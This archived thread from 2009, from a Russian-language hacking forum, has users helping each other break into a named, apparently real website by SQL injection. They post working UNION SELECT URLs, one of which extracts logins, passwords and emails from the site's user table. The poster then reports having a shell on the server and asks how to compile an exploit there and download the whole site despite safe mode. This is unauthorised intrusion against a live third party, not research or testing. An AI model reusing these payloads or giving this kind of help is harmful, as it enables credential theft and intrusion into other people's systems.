ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6801  
Старый 23.04.2009, 01:08
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PaCo
Не торопись с выводами. blind так составишь запросто, и я это описывал тут:
https://forum.antichat.ru/thread104591.html
Вопрос №6

И union можно, если немного подумать и потестить на локалке , попробуй
 
Ответить с цитированием

  #6802  
Старый 23.04.2009, 08:38
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

надо что-то типо:
http://site.ru/index.php?id=1+procedure+analyse()
Только работает оно не везде.. или у мну руки кривые=\
Вот почитай : клик
 
Ответить с цитированием

  #6803  
Старый 23.04.2009, 11:07
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

http://site.ru/index.php?id=1+procedure+analyse()
Ага всё я узнал префикс...и нашёл тоблицу g_users
Но также там значения видимо с префиксом...
Можно ли как-то узнать эти значения? (пытался брутить то стандартному словорю SIPT4)
 
Ответить с цитированием

  #6804  
Старый 23.04.2009, 12:01
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Возможно это поможет:
http://cr0w-at.blogspot.com/2009/03/mysql-4x.html
 
Ответить с цитированием

  #6805  
Старый 23.04.2009, 13:05
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от [Raz0r]  
Возможно это поможет:
http://cr0w-at.blogspot.com/2009/03/mysql-4x.html
Не помогает...

PHP код:
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+ 
таблички
cms_config
cms_group
cms_news
cms_users (поля gid uid)

Помогите вот на счёт этого весь день и парюсь...

Последний раз редактировалось Byrger; 23.04.2009 в 13:14..
 
Ответить с цитированием

  #6806  
Старый 23.04.2009, 15:07
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
Сообщение от Byrger  
Не помогает...

PHP код:
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+ 
таблички
cms_config
cms_group
cms_news
cms_users (поля gid uid)

Помогите вот на счёт этого весь день и парюсь...
Собственно в чём проблема не пойму? Вывод получить чтоли? Или я чего то не понимаю?
 
Ответить с цитированием

  #6807  
Старый 23.04.2009, 15:16
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Подобрать колонку, в которой хрянтся пассы=\.
 
Ответить с цитированием

  #6808  
Старый 23.04.2009, 19:45
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?
 
Ответить с цитированием

  #6809  
Старый 23.04.2009, 21:06
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от Byrger  
Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?



http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F,_login,_pass,_mail),6,7,8+from+cms_users--+


Цитата:
Сообщение от VITАL  
http://downloadportal.ru/10388-advanced-sql-injection-tricks-detali.html
А копирайты поставить ?

Последний раз редактировалось ElteRUS; 23.04.2009 в 21:11..
 
Ответить с цитированием

  #6810  
Старый 23.04.2009, 21:12
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от ElteRUS  



http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F,_login,_pass,_mail),6,7,8+from+cms_users--+

Лови ++

А тогда такой вопрос...
Есть шелл
Но на сервере не нашёл компилятора gcc в каталогах /sbin/ и /bin/ как быть?
Выполняя команду gcc Exploit.c -o Exploit ничего не происходит...

И как можно слить все файлы каталога с сайтом сразу?
Safe-mode: ON
Архивировать по средствам c99 не удаётся...
может возможно какойнить дампер на PHP залить туда? Если не сложно то какой

Последний раз редактировалось Byrger; 23.04.2009 в 22:19..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ